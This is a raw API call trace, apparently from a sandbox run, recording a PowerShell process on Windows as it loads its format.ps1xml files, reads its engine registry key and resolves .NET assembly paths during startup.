	[0801.358] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0801.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0801.358] CoTaskMemFree (pv=0x3cba10) 
	[0802.286] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0802.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.286] CoTaskMemFree (pv=0x3cba10) 
	[0802.288] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0802.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.288] CoTaskMemFree (pv=0x3cba10) 
	[0802.289] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0802.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.290] CoTaskMemFree (pv=0x3cba10) 
	[0802.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0802.291] SetErrorMode (uMode=0x1) returned 0x1
	[0802.291] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0802.291] GetFileType (hFile=0x30c) returned 0x1
	[0802.291] SetErrorMode (uMode=0x1) returned 0x1
	[0802.291] GetFileType (hFile=0x30c) returned 0x1
	[0802.292] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.293] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.293] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.294] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.295] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.295] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0802.295] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x9e2, lpOverlapped=0x0) returned 1
	[0802.295] ReadFile (in: hFile=0x30c, lpBuffer=0x3480aba, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3480aba*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0802.295] ReadFile (in: hFile=0x30c, lpBuffer=0x3481570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3481570*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0802.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x30c) returned 0x0
	[0802.296] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0802.296] CoTaskMemAlloc (cb=0x5a) returned 0x1b826470
	[0802.296] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x1b826470, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0802.296] CoTaskMemFree (pv=0x1b826470) 
	[0802.296] RegCloseKey (hKey=0x30c) returned 0x0
	[0802.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0802.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0802.306] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x6a1abbcb, Data2=0x6f27, Data3=0x496c, Data4=([0]=0x9f, [1]=0xc6, [2]=0xf7, [3]=0x5f, [4]=0x46, [5]=0x99, [6]=0x2f, [7]=0x19))) returned 0x0
	[0803.173] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xdb3db1b8, Data2=0x9c36, Data3=0x4a51, Data4=([0]=0xb4, [1]=0x74, [2]=0xaf, [3]=0x89, [4]=0x9, [5]=0x3, [6]=0xe6, [7]=0x86))) returned 0x0
	[0803.174] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0803.174] GetFileType (hFile=0x30c) returned 0x1
	[0803.174] SetErrorMode (uMode=0x1) returned 0x1
	[0803.174] GetFileType (hFile=0x30c) returned 0x1
	[0803.174] ReadFile (in: hFile=0x30c, lpBuffer=0x34ac0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ac0d8*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.175] ReadFile (in: hFile=0x30c, lpBuffer=0x34ac0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ac0d8*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.176] ReadFile (in: hFile=0x30c, lpBuffer=0x34ac0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ac0d8*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.177] ReadFile (in: hFile=0x30c, lpBuffer=0x34ac0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ac0d8*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.177] ReadFile (in: hFile=0x30c, lpBuffer=0x34ac0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ac0d8*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.179] ReadFile (in: hFile=0x30c, lpBuffer=0x34ac0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ac0d8*, lpNumberOfBytesRead=0x1ad178*=0xfb2, lpOverlapped=0x0) returned 1
	[0803.179] ReadFile (in: hFile=0x30c, lpBuffer=0x34ab7f2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ab7f2*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0803.179] ReadFile (in: hFile=0x30c, lpBuffer=0x34ac0d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ac0d8*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0803.179] CloseHandle (hObject=0x30c) returned 1
	[0803.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.179] SetErrorMode (uMode=0x1) returned 0x1
	[0803.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0803.180] SetErrorMode (uMode=0x1) returned 0x1
	[0803.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.180] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x30c) returned 0x0
	[0803.180] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0803.180] CoTaskMemAlloc (cb=0x5a) returned 0x1b826240
	[0803.180] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x1b826240, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0803.180] CoTaskMemFree (pv=0x1b826240) 
	[0803.180] RegCloseKey (hKey=0x30c) returned 0x0
	[0803.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0803.184] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x9783c333, Data2=0x56e0, Data3=0x40bf, Data4=([0]=0xae, [1]=0x5d, [2]=0xd2, [3]=0x74, [4]=0xf7, [5]=0xc5, [6]=0xb0, [7]=0x63))) returned 0x0
	[0803.185] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xda5bcff1, Data2=0x7e3a, Data3=0x40b9, Data4=([0]=0x9f, [1]=0x9c, [2]=0xb3, [3]=0xce, [4]=0xe7, [5]=0x9b, [6]=0x85, [7]=0xb0))) returned 0x0
	[0803.186] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x70d3e4a, Data2=0x2bf7, Data3=0x4c7d, Data4=([0]=0xb8, [1]=0xf8, [2]=0x7c, [3]=0x34, [4]=0x92, [5]=0x9b, [6]=0x88, [7]=0xf3))) returned 0x0
	[0803.186] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x8a907fbf, Data2=0xca76, Data3=0x4b70, Data4=([0]=0x90, [1]=0x9a, [2]=0x2b, [3]=0x58, [4]=0xcd, [5]=0x93, [6]=0x7d, [7]=0x83))) returned 0x0
	[0803.187] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfbaf8a7a, Data2=0x86a8, Data3=0x4fe9, Data4=([0]=0x8a, [1]=0x5b, [2]=0xca, [3]=0x15, [4]=0x93, [5]=0x6c, [6]=0xe3, [7]=0x31))) returned 0x0
	[0803.187] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x8eb6554, Data2=0xb63d, Data3=0x40fc, Data4=([0]=0xa6, [1]=0x30, [2]=0x68, [3]=0x5d, [4]=0x99, [5]=0x2d, [6]=0xaf, [7]=0xe0))) returned 0x0
	[0803.187] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0803.188] GetFileType (hFile=0x30c) returned 0x1
	[0803.188] SetErrorMode (uMode=0x1) returned 0x1
	[0803.188] GetFileType (hFile=0x30c) returned 0x1
	[0803.188] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.190] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.191] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.191] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.193] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.193] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0803.193] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0xaca, lpOverlapped=0x0) returned 1
	[0803.193] ReadFile (in: hFile=0x30c, lpBuffer=0x34f746a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f746a*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0803.193] ReadFile (in: hFile=0x30c, lpBuffer=0x34f7e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34f7e38*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0803.194] CloseHandle (hObject=0x30c) returned 1
	[0803.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.194] SetErrorMode (uMode=0x1) returned 0x1
	[0803.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0803.194] SetErrorMode (uMode=0x1) returned 0x1
	[0803.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.195] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x30c) returned 0x0
	[0803.195] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0803.195] CoTaskMemAlloc (cb=0x5a) returned 0x1b826240
	[0803.195] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x1b826240, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0803.195] CoTaskMemFree (pv=0x1b826240) 
	[0803.195] RegCloseKey (hKey=0x30c) returned 0x0
	[0803.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0803.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0803.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0803.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0804.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0804.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0804.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0804.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0804.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0804.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0804.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0804.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0804.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0804.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0804.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0804.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
